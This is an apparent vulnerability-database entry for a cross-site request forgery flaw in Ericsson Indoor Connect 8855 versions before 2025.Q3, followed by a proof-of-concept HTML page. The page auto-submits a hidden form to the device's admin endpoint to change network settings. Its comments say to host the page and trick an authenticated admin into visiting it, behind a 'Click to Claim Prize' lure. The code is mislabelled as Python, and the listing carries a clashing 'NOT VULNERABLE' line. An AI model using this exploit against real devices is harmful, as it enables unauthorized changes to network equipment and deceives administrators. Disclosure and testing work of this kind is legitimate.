Ericsson Indoor Connect 8855 versions prior to 2025.Q3 contains a
Cross-Site Request Forgery (CSRF) vulnerability which, if exploited, can lead
to unauthorized modification of certain information.
cpe:2.3:h:ericsson:indoor_connect_8855:-:*:*:*:*:*:*:* - NOT VULNERABLE
Ericsson Indoor Connect 8855 < 2025.Q3
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!--
Proof of Concept (PoC) for CVE-2025-40841
Description: HTML page demonstrating a CSRF attack to modify device settings.
Usage: Host this file on a web server and trick an authenticated admin to visit it.
-->
<html>
<body>
<!-- Form targeting the vulnerable endpoint (example URL) -->
<form action="http://target-device-ip/admin/apply" method="POST">
<!-- Input fields representing the configuration to be changed -->
<input type="hidden" name="setting_id" value="network_config" />
<input type="hidden" name="param_value" value="malicious_config" />
<input type="submit" value="Click to Claim Prize" />
</form>
<script>
// Automatically submit the form when the page loads to minimize interaction
document.forms[0].submit();
</script>
</body>
</html>